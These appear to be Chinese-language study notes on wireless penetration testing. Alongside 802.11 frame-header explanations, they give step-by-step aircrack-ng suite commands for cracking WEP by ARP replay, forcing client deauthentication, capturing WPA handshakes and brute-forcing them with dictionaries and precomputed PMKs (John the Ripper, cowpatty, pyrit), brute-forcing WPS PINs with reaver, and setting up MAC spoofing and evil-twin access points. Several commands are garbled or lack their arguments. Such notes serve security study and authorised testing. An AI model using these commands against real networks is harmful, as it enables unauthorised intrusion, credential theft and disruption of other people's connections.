无线渗透 iw list 显示无线网卡的详细信息,包括信道频率 iwlist wlan2 frequency 查看wlan2网卡的信道频率 扫描附近的AP •iw dev wlan2 scan | grep SSID •iw dev wlan2 scan | egrep “DS\ Parameter\ set|SSID” •iwlist wlan2 scanning | egrep “ESSID|Channel” 信号强度在-500dBm属于信号强度好,-75-50属于中等 添加删除侦听端口 •service network-manager stop 如果创建出问题 需要执行这个指令关闭这个服务 •iw dev wlan2 interface add wlan2mon type monitor 增加,wlan2mon必须这么命名,数字可以变 •Iw dev wlan2mon interface del 删除 802.11 MAC帧头部 frame control: protocol version: 协议版本 0123都有 type: 帧类型 0管理帧 1控制帧 2数据帧 subtype: 子类型 to DS、from DS: 都是0出现在IBSS环境中,也就是两台终端直连的情况AD-HOC(可能是管理帧或控制帧) 01表示data帧从AP向STATION传递 10表示data帧从STATION向AP传递 11表示两个AP之间通信,是典型的WDS环境下AP间通信,或mesh环境下MP间通信,只有此情况会用到address4字段 more fragment: 表示是否还有后续帧 data或management帧类型 只有单播(有mac地址)会分段 广播(mac地址全是F)不会分段 retry 值为1表示重传帧,data或management帧类型,接收端进程使用此值防止帧重复 power mgnt:0活动模式/1省电模式,STA在省电模式时几乎不接收数据,AP此帧永为0,发送给STA的data帧暂时由AP缓存,AP将STA激活后,STA向AP索要缓存的data more data:当AP缓存了至少一个MSDU时,会向省电模式的STA发送该值为1的帧,表示有数据要传输给STA,接收到此帧的STA唤醒自己并向AP发送PS-Poll帧,取回由AP为其缓存的数据。也被用于AP有更多的广播/多播帧需要发送的情况 protected frame:可能是Data或Management帧类型,表示MSDU是否被加密;也被用于表示PSK身份验证Frame#3帧;数据载荷为空时,该字段值为0 order:值为1表示数据必须按严格数据处理,通常为0
duration/ID:所有Control帧都使用该字段,其作用随Type/SubType变化有所不同:帧类型为PS Poll (type:1,subtype:10)时,表示STA关联的AID (association identity);其他情况下该字段作为一种载波侦听机制,表示接收下一帧之前需要保持的时间间隔,用于NAV (Network Allocation Vector)计算,单位是微秒
sequence control:sequence number:每个帧的编号,fragment number:被分段的帧每个分段的编号
aircrack-ng 包含各种功能的工具套件:网络检测、嗅探抓包、包注入、密码破解
airmon-ng 查看网卡的驱动、芯片等信息 airmon-ng check 查看aircrack在使用过程中和系统有什么冲突的地方 airmon-ng check kill 结束掉有影响的进程 airmon-ng start wlan2 将wlan2网卡启动侦听模式,并down掉wlan2网卡 airmon-ng start wlan2 10 同上并指定工作在10信道 iwlist wlan2mon channel 查看wlan2mon当前在哪个信道工作 airmon-ng stop wlan2mon 结束wlan2的侦听模式,需要手动重新up wlan2
airodump-ng wlan2mon 会在所有信道循环抓包 airodump-ng wlan2mon -c 1 --bssid 00:11:22:33:44:55 -w file.cap 参数-c 1指定侦听1信道,可能抓到相近信道的包,–bssid指定只抓某AP的包,-w将抓包结果保存到文件中,可加–ivs只抓ivs相关数据包 airodump-ng结果参数含义: BSSID: AP的MAC地址 PWR:网卡接收到的信号强度,距离越近倍号越强,-1表示驱动不支持信号强度、STA距离超出倍号接受范围 RXQ:最近10秒成功接收的数据帧的百分比(数据帧、管理帧},只有在固定信道时 才会出现 Beacons:接收到此AP发送的beacon帧数量 #Data:抓到的数据帧数量(WEP表示IV数量),包含广播数据帧 #/s:最近10秒内,每秒平均抓到的帧的数量 CH:信道号(从beacon帧中获得),信道重叠时可能发现其他信道 MB: AP支持的最大速率 ENC:采用的无线安全技术WEP、WPA、WPA2、OPEN CIPHER:采用的加密套件CCMP、TKIP、WEP40、WEP104 AUTH:身份认证方法MGT、PSK、SKA、OPEN ESSID:无线网络名称,隐藏AP此值可能为空,airodump从probe和association request帧中发现隐藏AP STATION: STA的MAC地址 Lost:通过sequence number判断最近10秒STA发送丟失的数据包数量(管理帧、数据帧),lost太高:干扰、距离;网卡发包不能收、收包不能发 Packets(frames): STA发送的数据包数量 Probes: STA探测的ESSID aireplay-ng包注入测试 基本测试:aireplay-ng -9 wlan2mon 向隐藏AP、指定SSID注入: aireplay-ng -9 -e leven -a EC:26:CA:FA:02:DC wlan2mon
MAC绑定攻击 管理员误以为MAC绑定是一种安全机制 macchanger命令修改自己网卡的mac地址即可
WEP攻击 IV并非完全随机,每224个包可能出现一次IV重用,收集大量IV之后找出相同IV及其对应密文,分析得出共享密码 ARP回包中包含IV IV足够多的情况下,任何复杂程度的wep密码都可以被破解
启动monitor模式,启动抓包并保存抓包,deauthentication抓取XOR文件,利用XOR文件与AP建立关联,执行ARP重放获得大量IV ,deauthentication触发ARP数据包,收集足够data之后破解密码
fake authentication WEP破解全部需要首先伪造认证,以便与AP进行正常通信 不产生ARP数据包 aireplay-ng -1 0 -e kifi -a -h aireplay-ng -1 60 -o 1 -q 10 -e -a -h 每6000秒发送reauthentication -o 1 每次身份认证只发一组认证数据包 -q 10 每10秒发keep-live帧 deauthentication攻击: 强制客户端与AP断开关联 •重连生成ARP谞求,AP回包包含IV • WPA重连过程过程抓取4步握手过程 •无客户端情况下此攻击无效 aireplay-ng -0 0 -a -c •不指定-c参数时,以广播攻击所有客户端 •每攻击发送128个包,64个给AP, 64个给客户端 •物理足够接近被攻击者 ARP重放: 侦听正常的ARP包并重放给AP AP回包中包含大量弱IV aireplay-ng -3 -b -h • -h合法客户端/供给者MAC Airodump-ng data字段是获取到的IV数量,建议获取IV数量:64bit密钥:25万,128bit密钥:150万 WEP破解:airecrack-ng wep.cap
WPA攻击 WPA PSK攻击,只有一种暴力破解的方法,使用deauthentication攻击获取4步握手信息,然后使用字典暴力破解 airolib 先计算出PMK,PMK在破解阶段被用于计算PTK,计算更快,通过完整性摘要值破解密码,具体流程如下: echo <ESSID名> > essid.txt
airolib-ng db --import essid essid.txt airolib-ng db --stats airolib-ng db --import passwd 自动剔除不合格的WPA字典 airolib-ng db --batch 生成PMK aircrack-ng -r db wpa.cap
JTR(john the ripper)破解密码 可以基于规则扩展密码字典,例如扩展手机号段,利用JTR规则增加手机号后几位数字,生成大量手机号码进行破解, 配置文件/etc/john/john.conf,在末尾增加: [List.Rules:Wordlist] [ 0 − 9 ] [0-9] [0−9][0-9]$[0-9] 测试效果:john --wordlist=password.lst --rules --stdout | grep -i Password123 破解调用:john --wordlist=pass.list --rules --stdout | aircrack-ng -e kifi -w - wpa.cap
COWPATTY破解密码 WPA密码通用破解工具,跨平台的软件 使用密码字典 • cowpatty -r wpa.cap -f password.lst -s kifi 使用彩虹表(PMK) • genpmk -f password.lst -d pmkhash -s kifi • cowpatty -r wpa.cap -d pmkhash -s kifi
PYRIT破解密码 与airolib、cowpatty相同,支持基于预计算的PMK提高破解速度 独有的优势 •除CPU之外pyrit可以运用GPU的强大运算能力加速生成PMK •本身支持抓包获取四步握手过程,无需用Airodum抓包 •也支持传统的读取airodump抓包获取四步握手的方式 只抓取WAP四次握手过程包 • pyrit -r wlan2mon -o wpapyrit.cap stripLive • pyrit -r wpapyrit.cap analyze 从airodump抓包导入并筛选 • pyrit -r wpa.cap -o wpapyrit.cap strip 使用密码字典直接破解 • pyrit -r wpapyrit.cap -i password.lst -b attack_passthrough 数据库模式破解 •默认使用基于文件的数据库,支持连接SQL数据库,将计算的PMK存入数据库 •查看默认数据库状态:pyrit eval •导入密码字典:pyrit-i password.lst import_passwords (剔除了不合规的密码) •指定ESSID:pyrit -e kifi create_essid •计算PMK:pyrit batch (发挥GPU计算能力) •破解密码:pyrit -r wpapyrit.cap -b attack_db
WPS攻击 PIN码先识别前4位,正确后再识别后4位,但最后一位是校验位,所以只需尝试11000这种组合,即可破解。 启动monitor模式,通过下面两条任一指令可查看支持WPS的AP: wash -F -i wlan0mon airodump-ng wlan0mon --wps 爆破PIN码: reaver -i wlan0mon -b -vv -c 13 参数vv显示详细信息,c指定AP所在的信道 reaver -i wlan0mon -b -vv -p <破解出来的PIN码> 获取密码
3vilTwintaccker伪造AP,让其他人连上自己的AP,抓取账号密码,或进行windows更新攻击等
AIRDECAP-NG 去除802.11头airdecap-ng -b 1.pcap 解密WPA加密数据airdecap-ng -e kifi -p -b 1.pcap,抓包文件中必须包含四步握手信息
AIRSERV-NG 通过网络提供无线网卡服务器,某些网卡可能不支持, 服务端airserv-ng -p 3333 -d wlan2mon, 客户端airodump-ng 192.168.1.1:3333 某些防火墙会影响C/S间的通信
AIRTUN-NG 无限入侵检测wIDS,需要无线密码和BSSID,需要获取握手信息, WPA: airtun-ng -a -p PSK -e kifi wlan2mon ifconfig at0 up 中继和重放 中继repeat,要求两块网卡都在monitor模式, airtun-ng -a --repeat --bssid -i wlan0mon wlan2mon wlan0mon:收包的网卡 wlan2mon:发包的网卡 -a:发包的源地址 –bssid:过滤只发指定源地址的包(可选) 重放replay,将抓取的CAP文件重放到指定的网卡, airtun-ng -a -r 1.cap
无线侦察kismet
